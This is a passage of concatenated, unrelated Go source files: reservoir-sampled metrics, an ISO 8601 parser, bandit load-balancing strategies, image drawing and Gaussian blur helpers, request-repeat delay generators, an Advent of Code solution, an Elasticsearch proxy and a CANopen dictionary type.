}
// sample returns the usable sample
func (m *Metric) sample() sample {
count := m.count
if count > reservoirSize {
count = reservoirSize
}
return m.data[:count]
}
// Count returns the number of samples recorded, which may exceed the
// reservoir size.
func (m *Metric) Count() int {
m.Lock()
defer m.Unlock()
return int(m.count)
}
// Max returns the maximum value in the sample, which may not be the maximum
// value ever to be part of the sample.
func (m *Metric) Max() int {
m.Lock()
defer m.Unlock()
return m.sample().Max()
}
// Mean returns the mean of the values in the sample.
func (m *Metric) Mean() float64 {
m.Lock()
defer m.Unlock()
return m.sample().Mean()
}
// Min returns the minimum value in the sample, which may not be the minimum
// value ever to be part of the sample.
func (m *Metric) Min() int {
m.Lock()
defer m.Unlock()
return m.sample().Min()
}
// Quantile returns a slice of arbitrary quantiles of the sample.
func (m *Metric) Quantile(quantiles ...float64) []float64 {
m.Lock()
defer m.Unlock()
return m.sample().Quantile(quantiles...)
}
// Snapshot returns a read-only copy of the sample.
func (m *Metric) Snapshot() *Snapshot {
m.Lock()
defer m.Unlock()
// Snapshot the data
sample := m.sample()
dest := make([]int32, len(sample))
copy(dest, sample)
return &Snapshot{
Metric: m.name,
Label: m.tag,
T0: m.create,
T1: time.Now().Unix(),
Amount: m.count,
Sample: dest,
}
}
// StdDev returns the standard deviation of the values in the sample.
func (m *Metric) StdDev() float64 {
m.Lock()
defer m.Unlock()
return m.sample().StdDev()
}
// Variance returns the variance of the values in the sample.
func (m *Metric) Variance() float64 {
m.Lock()
defer m.Unlock()
return m.sample().Variance()
}
// Rate returns a operation per second rate since the creation of the metric.
func (m *Metric) Rate() float64 {
t0, t1 := m.Window()
return float64(m.Count()) / float64(t1.Sub(t0).Seconds())
}
// Update samples a new value into the metric.
func (m *Metric) Update(v int32) {
count := atomic.AddInt32(&m.count, 1)
if count <= reservoirSize {
m.Lock()
m.data[count-1] = v
m.Unlock()
return
}
if r := int(rand.Int31n(count)); r < reservoirSize {
m.Lock()
m.data[r] = v
m.Unlock()
return
}
}
// UpdateTag updates the associated metric tag.
func (m *Metric) UpdateTag(tag string) {
m.Lock()
m.tag = tag
m.Unlock()
}
// Histogram creates a histogram with the bins provided.
func (m *Metric) Histogram(bins ...int) []Bin {
m.Lock()
defer m.Unlock()
return m.sample().Histogram(bins)
} | metric.go | 0.813313 | 0.457561 | metric.go | starcoder |
package util
import (
"fmt"
"regexp"
"strconv"
"time"
)
var yearRE = regexp.MustCompile(`^(\d{4})$`)
var monthRE = regexp.MustCompile(`^(\d{4})-(\d{2})$`)
var weekRE = regexp.MustCompile(`^(\d{4})-W(\d{2})$`)
var dayRE = regexp.MustCompile(`^(\d{4})-(\d{2})-(\d{2})$`)
var hourRE = regexp.MustCompile(`^(\d{4})-(\d{2})-(\d{2})T(\d{2})$`)
type Granularity int
const (
Year Granularity = iota
Month
Week
Day
Hour
)
// ParseISO8601 is **not** a function to parse all and every kind of valid ISO 8601
// date, nor it's intended to be, since we don't need that.
func ParseISO8601(s string) (*time.Time, Granularity, error) {
if matches := yearRE.FindStringSubmatch(s); len(matches) != 0 {
year, err := parseYear(matches[1])
if err != nil {
return nil, -1, err
}
t := time.Date(year, time.December, daysOfMonth(time.December, year), 23, 59, 59, 0, time.UTC)
return &t, Year, nil
}
if matches := monthRE.FindStringSubmatch(s); len(matches) != 0 {
month, err := parseMonth(matches[2])
if err != nil {
return nil, -1, err
}
year, err := parseYear(matches[1])
if err != nil {
return nil, -1, err
}
t := time.Date(year, month, 31, 23, 59, 59, 0, time.UTC)
return &t, Month, nil
}
if matches := weekRE.FindStringSubmatch(s); len(matches) != 0 {
week, err := parseWeek(matches[2])
if err != nil {
return nil, -1, err
}
year, err := parseYear(matches[1])
if err != nil {
return nil, -1, err
}
t := time.Date(year, time.January, week*7, 23, 59, 59, 0, time.UTC)
return &t, Week, nil
}
if matches := dayRE.FindStringSubmatch(s); len(matches) != 0 {
month, err := parseMonth(matches[2])
if err != nil {
return nil, -1, err
}
year, err := parseYear(matches[1])
if err != nil {
return nil, -1, err
}
day, err := parseDay(matches[3], daysOfMonth(month, year))
if err != nil {
return nil, -1, err
}
t := time.Date(year, month, day, 23, 59, 59, 0, time.UTC)
return &t, Day, nil
}
if matches := hourRE.FindStringSubmatch(s); len(matches) != 0 {
month, err := parseMonth(matches[2])
if err != nil {
return nil, -1, err
}
year, err := parseYear(matches[1])
if err != nil {
return nil, -1, err
}
hour, err := parseHour(matches[4])
if err != nil {
return nil, -1, err
}
day, err := parseDay(matches[3], daysOfMonth(month, year))
if err != nil {
return nil, -1, err
}
t := time.Date(year, month, day, hour, 59, 59, 0, time.UTC)
return &t, Hour, nil
}
return nil, -1, fmt.Errorf("string does not match any formats")
}
func daysOfMonth(month time.Month, year int) int {
switch month {
case time.January:
return 31
case time.February:
if isLeap(year) {
return 29
} else {
return 28
}
case time.March:
return 31
case time.April:
return 30
case time.May:
return 31
case time.June:
return 30
case time.July:
return 31
case time.August:
return 31
case time.September:
return 30
case time.October:
return 31
case time.November:
return 30
case time.December:
return 31
default:
panic("invalid month!")
}
}
func isLeap(year int) bool {
if year%4 != 0 {
return false
} else if year%100 != 0 {
return true
} else if year%400 != 0 {
return false
} else {
return true
}
}
func atoi(s string) int {
i, e := strconv.Atoi(s)
if e != nil {
// panic on error since atoi() will be called only after we parse it with regex
// (hopefully `\d`!)
panic(e.Error())
}
return i
}
func parseYear(s string) (int, error) {
year := atoi(s)
if year <= 1583 {
return 0, fmt.Errorf("years before 1583 are not allowed")
}
return year, nil
}
func parseMonth(s string) (time.Month, error) {
month := atoi(s)
if month <= 0 || month >= 13 {
return time.Month(-1), fmt.Errorf("month is not in range [01, 12]")
}
return time.Month(month), nil
}
func parseWeek(s string) (int, error) {
week := atoi(s)
if week <= 0 || week >= 54 {
return -1, fmt.Errorf("week is not in range [01, 53]")
}
return week, nil
}
func parseDay(s string, max int) (int, error) {
day := atoi(s)
if day <= 0 || day > max {
return -1, fmt.Errorf("day is not in range [01, %d]", max)
}
return day, nil
}
func parseHour(s string) (int, error) {
hour := atoi(s)
if hour <= -1 || hour >= 25 {
return -1, fmt.Errorf("hour is not in range [00, 24]")
}
return hour, nil
} | internal/pkg/magneticod/util/iso8601.go | 0.534127 | 0.483039 | iso8601.go | starcoder |
package pooly
import (
"math"
"math/rand"
"sync"
)
// SoftMax strategy varies host selection probabilities as a graded function of their estimated scores.
// The temperature parameter is used to tweak the algorithm behavior:
// high temperature (+inf) means that all hosts will have nearly the same probability of being selected (equiprobable)
// low temperature (+0) favors a greedy selection and will tend to select hosts having the highest scores
type SoftMax struct {
temperature float32
}
// NewSoftMax creates a new SoftMax bandit strategy.
func NewSoftMax(temperature float32) *SoftMax {
return &SoftMax{temperature}
}
// Select implements the Selecter interface.
func (s *SoftMax) Select(hosts map[string]*Host) *Host {
var sum, prob float64
exp := make(map[*Host]float64, len(hosts))
for _, h := range hosts {
score := h.Score()
if score < 0 { // no score recorded
exp[h] = 0
continue
}
exp[h] = math.Exp(score / float64(s.temperature))
sum += exp[h]
}
p := rand.Float64()
for _, h := range hosts {
if sum == 0 {
return h
}
prob += exp[h] / sum // cumulative probability
if prob > p {
return h
}
}
return nil
}
// EpsilonGreedy strategy selects generally the host having the highest score (greedy) but every once in a while
// it will randomly explore for other alternatives.
// The epsilon parameter (0-1) defines the proportion that the exploration phase occupies (e.g 1 for 100%).
type EpsilonGreedy struct {
epsilon float32
}
// NewEpsilonGreedy creates a new EpsilonGreedy bandit strategy.
func NewEpsilonGreedy(epsilon float32) *EpsilonGreedy {
return &EpsilonGreedy{epsilon}
}
// Select implements the Selecter interface.
func (e *EpsilonGreedy) Select(hosts map[string]*Host) (host *Host) {
if rand.Float32() > e.epsilon { // exploit
var max float64 = -1
for _, h := range hosts {
score := h.Score()
if max = math.Max(max, score); max == score {
host = h
}
}
} else { // explore
i, n := 0, rand.Intn(len(hosts))
for _, h := range hosts {
if i == n {
host = h
break
}
i++
}
}
return
}
// RoundRobin strategy selects hosts in circular manner with every request returning the next host in line.
type RoundRobin struct {
sync.Mutex
nextSchedule int64
nextAvailSlot int64
}
// NewRoundRobin creates a new RoundRobin bandit strategy.
func NewRoundRobin() *RoundRobin {
return new(RoundRobin)
}
// Select implements the Selecter interface.
func (r *RoundRobin) Select(hosts map[string]*Host) (host *Host) {
var offset int64
var found bool
// XXX score is not used, use it to attribute round robin scheduling instead
// we don't need proper synchronization since score memoization isn't running here
r.Lock()
for _, h := range hosts {
if h.score < 0 { // no score recorded
h.score = float64(r.nextAvailSlot)
r.nextAvailSlot++
}
if int64(h.score) == r.nextSchedule {
offset = 1
host = h
found = true
}
if !found {
// Find the next best schedule
o := int64(h.score) - r.nextSchedule
if o < 0 {
o = r.nextAvailSlot + o
}
if offset == 0 || o < offset {
offset = o + 1
host = h
}
}
}
r.nextSchedule = (r.nextSchedule + offset) % r.nextAvailSlot
r.Unlock()
return
} | bandit.go | 0.749362 | 0.53279 | bandit.go | starcoder |
package graphics
import (
"github.com/ironarachne/world/pkg/geometry"
"image"
"image/color"
"os"
"github.com/fogleman/gg"
)
// Pattern is a fill pattern
type Pattern struct {
Type string
Color color.RGBA
PatternFileName string
}
// Center returns the center point of a given rectangle
func Center(rect image.Rectangle) image.Point {
centerX := (rect.Max.X - rect.Min.X) / 2
centerY := (rect.Max.Y - rect.Min.Y) / 2
point := image.Point{
X: centerX,
Y: centerY,
}
return point
}
// CenteredRectangle returns a rectangle of the given dimensions centered on the given point
func CenteredRectangle(centerPoint image.Point, width int, height int) image.Rectangle {
rMinX := centerPoint.X - (width / 2)
rMinY := centerPoint.Y - (height / 2)
rMaxX := centerPoint.X + (width / 2)
rMaxY := centerPoint.Y + (height / 2)
centeredRectangle := image.Rectangle{
Min: image.Point{X: rMinX, Y: rMinY},
Max: image.Point{X: rMaxX, Y: rMaxY},
}
return centeredRectangle
}
// DrawCircle returns an image with a circle drawn matching the given input on the given image
func DrawCircle(circle geometry.Circle, color string, canvas image.Image) image.Image {
c := gg.NewContextForImage(canvas)
c.DrawCircle(circle.Center.X, circle.Center.Y, circle.Radius)
c.SetHexColor(color)
c.SetLineWidth(1)
c.Stroke()
newImage := c.Image()
return newImage
}
// DrawEdges returns an image with all of the given edges rendered on the given image
func DrawEdges(edges []geometry.Edge, color string, canvas image.Image) image.Image {
c := gg.NewContextForImage(canvas)
for _, e := range edges {
c.DrawLine(e.A.X, e.A.Y, e.B.X, e.B.Y)
c.SetHexColor(color)
c.Stroke()
}
newImage := c.Image()
return newImage
}
// DrawEdge returns an image with all of the given edges rendered on the given image
func DrawEdge(edge geometry.Edge, color string, canvas image.Image) image.Image {
im := DrawEdges([]geometry.Edge{edge}, color, canvas)
return im
}
// DrawPoints returns an image with all of the given points rendered on the given image
func DrawPoints(points []geometry.Point, color string, canvas image.Image) image.Image {
c := gg.NewContextForImage(canvas)
for _, p := range points {
c.DrawPoint(p.X, p.Y, 1)
c.SetHexColor(color)
c.Fill()
}
newImage := c.Image()
return newImage
}
// DrawPolygon returns an image with the given polygon drawn on the given image
func DrawPolygon(polygon geometry.Polygon, color string, canvas image.Image) image.Image {
newImage := DrawEdges(polygon.Edges, color, canvas)
return newImage
}
// DrawTriangle returns an image with the given triangle drawn on the given image
func DrawTriangle(triangle geometry.Triangle, color string, canvas image.Image) image.Image {
var edges []geometry.Edge
edges = append(edges, triangle.AB)
edges = append(edges, triangle.BC)
edges = append(edges, triangle.CA)
newImage := DrawEdges(edges, color, canvas)
return newImage
}
// LoadPNG loads a PNG image and returns it as an Image. It relies on the WORLDAPI_DATA_PATH
// environment variable to determine where to load the file from.
func LoadPNG(path string) image.Image {
dataPath := os.Getenv("WORLDAPI_DATA_PATH")
filePath := dataPath + "/" + path
im, err := gg.LoadPNG(filePath)
if err != nil {
panic(err)
}
return im
}
// Fill fills an image with a pattern
func (pattern Pattern) Fill(dc *gg.Context) {
if pattern.Type == "image" {
filePath := "images/patterns/" + pattern.PatternFileName
im, err := gg.LoadPNG(filePath)
if err != nil {
panic(err)
}
pattern := gg.NewSurfacePattern(im, gg.RepeatBoth)
dc.SetFillStyle(pattern)
} else {
dc.SetColor(pattern.Color)
}
dc.Fill()
}
// RenderFilledImage returns an image filled with a particular pattern
func RenderFilledImage(path string, pattern Pattern) image.Image {
maskImage := LoadPNG(path)
mc := gg.NewContextForImage(maskImage)
imageMask := mc.AsMask()
dc := gg.NewContextForImage(maskImage)
err := dc.SetMask(imageMask)
if err != nil {
panic("Could not set mask for pattern image")
}
dc.DrawRectangle(0, 0, float64(dc.Width()), float64(dc.Height()))
pattern.Fill(dc)
newImage := dc.Image()
return newImage
} | pkg/graphics/graphics.go | 0.90941 | 0.695267 | graphics.go | starcoder |
package uhttp
import (
"math/rand"
"time"
)
// RepeatFunc generates delays between successive repeats of a request. prev will
// contain the value of the previous repeat (zero for the first). It should return
// nil to stop repeating, and should not be called after that.
type RepeatFunc func(prev time.Duration) *time.Duration
// RepeatGenerator produces RepeatFuncs.
type RepeatGenerator func() RepeatFunc
// RepeatAfter generates a RepeatFunc that returns delay num times, and then returns nil.
// If num is <= 0, this will return delay forever.
func RepeatAfter(delay time.Duration, num int) RepeatGenerator {
if num == 0 {
num = -1
}
return func() RepeatFunc {
num := num
return func(_ time.Duration) *time.Duration {
switch {
case num > 0:
num--
fallthrough
case num < 0:
return &delay
default:
return nil
}
}
}
}
// RepeatJoin generates a RepeatFunc that iterates over gens, instantiates RepeatFuncs from them,
// and returns values from each until they return nil, at which point it moves on to the next
// RepeatFunc. Returns nil once all resulting RepeatFunc instances have returned nil.
func RepeatJoin(gens ...RepeatGenerator) RepeatGenerator {
return func() RepeatFunc {
var i int
var fn RepeatFunc
return func(prev time.Duration) *time.Duration {
var got *time.Duration
for i < len(gens) {
if fn == nil { // "start" the repeater
fn = gens[i]()
}
if got = fn(prev); got != nil {
return got
}
i++
fn = nil
}
return nil
}
}
}
// randomDuration returns a duration between low and high.
func randomDuration(low, high time.Duration) time.Duration {
if low > high {
low, high = high, low
}
return time.Duration(rand.Int63n(int64(high)-int64(low)) + int64(low))
}
// RepeatRandom generates a RepeatFunc that returns a random duration between [low, high), num
// times, and then returns nil. If num is 0, this will return delays forever.
func RepeatRandom(low, high time.Duration, num int) RepeatGenerator {
if num == 0 {
num = -1
}
return func() RepeatFunc {
num := num
return func(_ time.Duration) *time.Duration {
switch {
case num > 0:
num--
fallthrough
case num < 0:
d := randomDuration(low, high)
return &d
default:
return nil
}
}
}
} | repeat.go | 0.590425 | 0.460713 | repeat.go | starcoder |
package challenges
import (
"bufio"
"fmt"
"math"
"os"
)
// D6C1 - Day 6 Challenge 1
// Input is a list of strings in the form of `346, 260`
// Output is a single unsigned int
func D6C1() {
var coords [][2]int
maxX, maxY, minX, minY := 0, 0, 0, 0
// Populate coords
for in := bufio.NewScanner(os.Stdin); in.Scan(); {
x, y := 0, 0
fmt.Sscanf(in.Text(), "%d, %d", &x, &y)
coords = append(coords, [2]int{x, y})
// Register max and min coords
if x > maxX {
maxX = x
}
if y > maxY {
maxY = y
}
if x < minX {
minX = x
}
if y < minY {
minY = y
}
}
votes := map[int]int{}
// Calculate the area of each point
for y := minY; y <= maxY; y++ {
for x := minX; x <= maxX; x++ {
c := findClosest([2]int{x, y}, coords)
if y == minY || y == maxY || x == maxX || x == minX {
// Weight down points that have infinite area
votes[c] = -1e4
} else if c == -1 {
// Ignore draws
continue
} else {
votes[c]++
}
}
}
// Find the largest area
max := -1
for _, v := range votes {
if v > max {
max = v
}
}
println(max)
}
// D6C2 - Day 6 Challenge 2
// Input is a list of strings in the form of `346, 260`
// Output is a single unsigned int
func D6C2() {
var coords [][2]int
maxD := int(1e4)
maxX, maxY, minX, minY := 0, 0, 0, 0
// Populate coords
for in := bufio.NewScanner(os.Stdin); in.Scan(); {
x, y := 0, 0
fmt.Sscanf(in.Text(), "%d, %d", &x, &y)
coords = append(coords, [2]int{x, y})
// Register max and min coords
if x > maxX {
maxX = x
}
if y > maxY {
maxY = y
}
if x < minX {
minX = x
}
if y < minY {
minY = y
}
}
votes := 0
// This assumes that the points are far enough from each other that we don't
// need to look outside of the [(minX,minY), (maxX,maxY)] rectangles.
// It should probably include a buffer zone calculated using maxD and the
// distance between the points that are the farthest from each other on the
// X or Y axis,
// Works for me, so I'll spare my CPU the extra loops
for y := minY; y <= maxY; y++ {
outer:
for x := minX; x <= maxX; x++ {
accumulator := 0
for _, c := range coords {
accumulator += manhattanDistance(c, [2]int{x, y})
if accumulator >= maxD {
// We don't need to continue calculating
continue outer
}
}
// This point survived
votes++
}
}
println(votes)
}
func findClosest(p [2]int, coords [][2]int) int {
minDistance, closest := math.MaxInt64, -1
for n, p0 := range coords {
if p0 == p {
// Exit early if it is the same point
return n
}
d := manhattanDistance(p, p0)
if d < minDistance {
// Found a closer point
minDistance = d
closest = n
} else if d == minDistance {
// If we don't find another point that's closer, this is a draw
closest = -1
}
}
return closest
}
// |X1-X2| + |Y1-Y2|
func manhattanDistance(p1, p2 [2]int) int {
return int(math.Abs(float64(p1[0]-p2[0])) + math.Abs(float64(p1[1]-p2[1])))
} | challenges/day6.go | 0.621771 | 0.496765 | day6.go | starcoder |
Pyrios is an Elasticsearch proxy.
Pyrios forwards the HTTP request from a client to the on prem ElasticSearch cluster
and sends the response back to the client.
The in-cluster application can access the pyrios API endpoint via the `pyrios` service.
*/
package main
import (
"cloud.google.com/go/compute/metadata"
"context"
"contrib.go.opencensus.io/exporter/stackdriver"
"fmt"
"go.opencensus.io/trace"
"io"
"log"
"net/http"
"os"
)
// Sets the default server IP and port for ElasticSearch server
const (
defaultESServer = "127.0.0.1"
defaultESPort = 9200
)
/*
HandleHTTP is our main HTTP handler.
It takes the IP address of the on prem elasticsearch endpoint
in our demo. This is the regional static IP address exposed by the internal
load balancer of the on premise cluster's elastic-client service.
It takes a request from a client, forwards over to the on prem elasticsearch
endpoint, then copy the response back.
*/
func handleHTTP(esServer string, w http.ResponseWriter, r *http.Request) {
ep := *r.URL
path := ep.Path
ep.Host = fmt.Sprintf("%s:%d", esServer, defaultESPort)
ep.Scheme = "http"
startOptions := trace.WithSampler(trace.AlwaysSample())
_, span := trace.StartSpan(r.Context(), path, startOptions)
defer span.End()
// Rewrite the request with the elasticsearch endpoint.
req, err := http.NewRequest(r.Method, ep.String(), r.Body)
if err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
log.Printf("error creating new request encountered: %v ", err)
return
}
// Enforce the Content-Type for working with ES 6.x and up.
// https://www.elastic.co/blog/strict-content-type-checking-for-elasticsearch-rest-requests
req.Header.Set("Content-Type", "application/json")
resp, err := http.DefaultClient.Do(req)
if err != nil {
http.Error(w, err.Error(), http.StatusBadRequest)
log.Printf("error sending request to the on prem elasticsearch cluster encountered: %v ", err)
return
}
// Copy the response head and body from the elasticsearch API 's response
// and send back to the client side.
w.WriteHeader(http.StatusOK)
copyHeader(w.Header(), resp.Header)
io.Copy(w, resp.Body)
defer resp.Body.Close()
log.Print("Pyrios proxy request handled successfully")
}
// Helper func copies http headers from src to dst.
// It returns nothing, dst is changed and returned as a copy of src.
func copyHeader(dst, src http.Header) {
for k, vv := range src {
for _, v := range vv {
dst.Add(k, v)
}
}
}
// Our main entry function to read relevant environment variables
// and set up the http handler.
func main() {
gcpProject := os.Getenv("GCP_PROJECT")
var err error
if gcpProject == "" {
metadataClient := metadata.NewClient(http.DefaultClient)
if metadataClient == nil {
log.Fatal("Metadata client failed to create")
}
gcpProject, err = metadataClient.ProjectID()
if err != nil {
log.Fatal("Cannot determine GCP project")
}
}
// Here we decide where to export our OpenCensus data.
exporter, err := stackdriver.NewExporter(
stackdriver.Options{
ProjectID: gcpProject,
})
if err != nil {
log.Fatal("Failed to create Stackdriver trace exporter")
}
trace.RegisterExporter(exporter)
// Here we read ES_SERVER from the environment or use a default value.
esServer := os.Getenv("ES_SERVER")
if esServer == "" {
log.Print(fmt.Sprintf("ES_SERVER is not set, using default value of %s", defaultESServer))
esServer = defaultESServer
}
// Set up the HTTP server with a http handler.
// https://godoc.org/net/http Custom Server.
s := &http.Server{
Addr: fmt.Sprintf(":%d", defaultESPort),
Handler: http.HandlerFunc(
func(w http.ResponseWriter, r *http.Request) {
handleHTTP(esServer, w, r)
})}
defer s.Shutdown(context.Background())
log.Print("Starting pyrios proxy")
s.ListenAndServe()
} | pyrios/main.go | 0.69451 | 0.411939 | main.go | starcoder |
package canopen
type DicArray struct {
Description string
Index uint16
Name string
SDOClient *SDOClient
SubIndexes map[uint8]DicObject
SubNames map[string]uint8
}
func (array *DicArray) GetIndex() uint16 {
return array.Index
}
func (array *DicArray) GetSubIndex() uint8 { return 0 }
func (array *DicArray) GetName() string {
return array.Name
}
// AddMember to SubIndexes
func (array *DicArray) AddMember(object DicObject) {
if array.SubIndexes == nil {
array.SubIndexes = map[uint8]DicObject{}
}
if array.SubNames == nil {
array.SubNames = map[string]uint8{}
}
array.SubIndexes[object.GetSubIndex()] = object
array.SubNames[object.GetName()] = object.GetSubIndex()
}
func (array *DicArray) FindIndex(index uint16) DicObject {
if object, ok := array.SubIndexes[uint8(index)]; ok {
object.SetSDO(array.SDOClient)
return object
}
return nil
}
func (array *DicArray) FindName(name string) DicObject {
if index, ok := array.SubNames[name]; ok {
return array.FindIndex(uint16(index))
}
return nil
}
func (array *DicArray) GetDataType() byte { return 0x00 }
func (array *DicArray) GetDataLen() int { return 0 }
func (array *DicArray) SetSize(s int) {}
func (array *DicArray) SetOffset(s int) {}
func (array *DicArray) GetOffset() int { return 0 }
func (array *DicArray) Read() error { return nil }
func (array *DicArray) Save() error { return nil }
func (array *DicArray) GetData() []byte { return nil }
func (array *DicArray) SetData(data []byte) {}
func (array *DicArray) GetStringVal() *string { return nil }
func (array *DicArray) GetFloatVal() *float64 { return nil }
func (array *DicArray) GetUintVal() *uint64 { return nil }
func (array *DicArray) GetIntVal() *int64 { return nil }
func (array *DicArray) GetBoolVal() *bool { return nil }
func (array *DicArray) GetByteVal() *byte { return nil }
func (array *DicArray) SetStringVal(a string) {}
func (array *DicArray) SetFloatVal(a float64) {}
func (array *DicArray) SetUintVal(a uint64) {}
func (array *DicArray) SetIntVal(a int64) {}
func (array *DicArray) SetBoolVal(a bool) {}
func (array *DicArray) SetByteVal(a byte) {}
func (array *DicArray) IsDicVariable() bool { return false }
func (array *DicArray) SetSDO(sdo *SDOClient) {
array.SDOClient = sdo
} | dic_array.go | 0.625324 | 0.450359 | dic_array.go | starcoder |
package song2
// https://www.youtube.com/watch?v=SSbBvKaM6sk
import (
"image"
"image/color"
"image/draw"
"math"
"runtime"
"sync"
)
func GaussianBlur(src image.Image, r float64) *image.RGBA {
clone := CloneToRGBA(src)
dst := CloneToRGBA(src)
bxs := BoxesForGauss(r, 3)
for _, b := range bxs {
boxBlur(clone, dst, (b-1)/2)
}
return dst
}
type Direction int
const (
dirX Direction = iota
dirY
)
func boxBlur(src, dst *image.RGBA, r int) {
height := src.Bounds().Max.Y - src.Bounds().Min.Y
width := src.Bounds().Max.X - src.Bounds().Min.X
boxBlurParallel(dirX, height, dst, src, r)
boxBlurParallel(dirY, width, src, dst, r)
}
func boxBlurParallel(d Direction, length int, src, dst *image.RGBA, r int) {
procs := runtime.NumCPU()
ps := length / procs
var wg sync.WaitGroup
for length > 0 {
start := length - ps
if start < 0 {
start = 0
}
end := length
length -= ps
wg.Add(1)
go func() {
defer wg.Done()
switch d {
case dirX:
BoxBlurHorizontal(src, dst, src.Bounds().Min.Y+start, src.Bounds().Min.Y+end, r)
case dirY:
BoxBlurTotal(src, dst, src.Bounds().Min.X+start, src.Bounds().Min.X+end, r)
}
}()
}
wg.Wait()
}
func BoxBlurHorizontal(src, dst *image.RGBA, start, end, r int) {
fr := float64(r)
iarr := 1.0 / (fr + fr + 1.0)
for i := start; i < end; i++ {
ti := src.Bounds().Min.X
li := ti
ri := ti + r
fvpos := src.PixOffset(ti, i)
lvpos := src.PixOffset(src.Bounds().Max.X-1, i)
fvr := int(src.Pix[fvpos+0])
fvg := int(src.Pix[fvpos+1])
fvb := int(src.Pix[fvpos+2])
fva := int(src.Pix[fvpos+3])
val_r := fvr * (r + 1)
val_g := fvg * (r + 1)
val_b := fvb * (r + 1)
val_a := fva * (r + 1)
for j := 0; j < r; j++ {
pos := src.PixOffset(ti+j, i)
val_r += int(src.Pix[pos+0])
val_g += int(src.Pix[pos+1])
val_b += int(src.Pix[pos+2])
val_a += int(src.Pix[pos+3])
}
for j := 0; j <= r; j++ {
pos := src.PixOffset(ri, i)
ri++
val_r += int(src.Pix[pos+0]) - fvr
val_g += int(src.Pix[pos+1]) - fvg
val_b += int(src.Pix[pos+2]) - fvb
val_a += int(src.Pix[pos+3]) - fva
_r := uint8(math.Round(float64(val_r) * iarr))
_g := uint8(math.Round(float64(val_g) * iarr))
_b := uint8(math.Round(float64(val_b) * iarr))
_a := uint8(math.Round(float64(val_a) * iarr))
dst.SetRGBA(ti, i, color.RGBA{_r, _g, _b, _a})
ti++
}
for j := r + 1; j < src.Bounds().Max.X-r; j++ {
ripos := src.PixOffset(ri, i)
ri++
lipos := src.PixOffset(li, i)
li++
val_r += int(src.Pix[ripos+0]) - int(src.Pix[lipos+0])
val_g += int(src.Pix[ripos+1]) - int(src.Pix[lipos+1])
val_b += int(src.Pix[ripos+2]) - int(src.Pix[lipos+2])
val_a += int(src.Pix[ripos+3]) - int(src.Pix[lipos+3])
_r := uint8(math.Round(float64(val_r) * iarr))
_g := uint8(math.Round(float64(val_g) * iarr))
_b := uint8(math.Round(float64(val_b) * iarr))
_a := uint8(math.Round(float64(val_a) * iarr))
dst.SetRGBA(ti, i, color.RGBA{_r, _g, _b, _a})
ti++
}
for j := src.Bounds().Max.X - r; j < src.Bounds().Max.X; j++ {
pos := src.PixOffset(li, i)
li++
val_r += int(src.Pix[lvpos+0]) - int(src.Pix[pos+0])
val_g += int(src.Pix[lvpos+1]) - int(src.Pix[pos+1])
val_b += int(src.Pix[lvpos+2]) - int(src.Pix[pos+2])
val_a += int(src.Pix[lvpos+3]) - int(src.Pix[pos+3])
_r := uint8(math.Round(float64(val_r) * iarr))
_g := uint8(math.Round(float64(val_g) * iarr))
_b := uint8(math.Round(float64(val_b) * iarr))
_a := uint8(math.Round(float64(val_a) * iarr))
dst.SetRGBA(ti, i, color.RGBA{_r, _g, _b, _a})
ti++
}
}
}
func BoxBlurTotal(src, dst *image.RGBA, start, end, r int) {
fr := float64(r)
iarr := 1.0 / (fr + fr + 1.0)
for i := start; i < end; i++ {
ti := src.Bounds().Min.Y
li := ti
ri := ti + r
fvpos := src.PixOffset(i, ti)
lvpos := src.PixOffset(i, src.Bounds().Max.Y-1)
fvr := int(src.Pix[fvpos+0])
fvg := int(src.Pix[fvpos+1])
fvb := int(src.Pix[fvpos+2])
fva := int(src.Pix[fvpos+3])
val_r := fvr * (r + 1)
val_g := fvg * (r + 1)
val_b := fvb * (r + 1)
val_a := fva * (r + 1)
for j := 0; j < r; j++ {
pos := src.PixOffset(i, ti+j)
val_r += int(src.Pix[pos+0])
val_g += int(src.Pix[pos+1])
val_b += int(src.Pix[pos+2])
val_a += int(src.Pix[pos+3])
}
for j := 0; j <= r; j++ {
pos := src.PixOffset(i, ri)
ri++
val_r += int(src.Pix[pos+0]) - fvr
val_g += int(src.Pix[pos+1]) - fvg
val_b += int(src.Pix[pos+2]) - fvb
val_a += int(src.Pix[pos+3]) - fva
_r := uint8(math.Round(float64(val_r) * iarr))
_g := uint8(math.Round(float64(val_g) * iarr))
_b := uint8(math.Round(float64(val_b) * iarr))
_a := uint8(math.Round(float64(val_a) * iarr))
dst.SetRGBA(i, ti, color.RGBA{_r, _g, _b, _a})
ti++
}
for j := r + 1; j < src.Bounds().Max.Y-r; j++ {
ripos := src.PixOffset(i, ri)
ri++
lipos := src.PixOffset(i, li)
li++
val_r += int(src.Pix[ripos+0]) - int(src.Pix[lipos+0])
val_g += int(src.Pix[ripos+1]) - int(src.Pix[lipos+1])
val_b += int(src.Pix[ripos+2]) - int(src.Pix[lipos+2])
val_a += int(src.Pix[ripos+3]) - int(src.Pix[lipos+3])
_r := uint8(math.Round(float64(val_r) * iarr))
_g := uint8(math.Round(float64(val_g) * iarr))
_b := uint8(math.Round(float64(val_b) * iarr))
_a := uint8(math.Round(float64(val_a) * iarr))
dst.SetRGBA(i, ti, color.RGBA{_r, _g, _b, _a})
ti++
}
for j := src.Bounds().Max.Y - r; j < src.Bounds().Max.Y; j++ {
pos := src.PixOffset(i, li)
li++
val_r += int(src.Pix[lvpos+0]) - int(src.Pix[pos+0])
val_g += int(src.Pix[lvpos+1]) - int(src.Pix[pos+1])
val_b += int(src.Pix[lvpos+2]) - int(src.Pix[pos+2])
val_a += int(src.Pix[lvpos+3]) - int(src.Pix[pos+3])
_r := uint8(math.Round(float64(val_r) * iarr))
_g := uint8(math.Round(float64(val_g) * iarr))
_b := uint8(math.Round(float64(val_b) * iarr))
_a := uint8(math.Round(float64(val_a) * iarr))
dst.SetRGBA(i, ti, color.RGBA{_r, _g, _b, _a})
ti++
}
}
}
// BoxesForGauss
func BoxesForGauss(sigma float64, n int) []int { // standard deviation, number of boxes
nf := float64(n)
wIdeal := math.Sqrt(12.0*sigma*sigma/nf + 1.0)
wl := int(math.Floor(wIdeal))
if wl%2 == 0 {
wl--
}
wu := wl + 2
mIdeal := (12.0*sigma*sigma - float64(n*wl*wl+4*n*wl+3*n)) / float64(-4*wl-4)
m := math.Round(mIdeal)
sizes := make([]int, n)
for i := 0; i < n; i++ {
if float64(i) < m {
sizes[i] = wl
} else {
sizes[i] = wu
}
}
return sizes
}
// CloneToRGBA
func CloneToRGBA(src image.Image) *image.RGBA {
b := src.Bounds()
dst := image.NewRGBA(b)
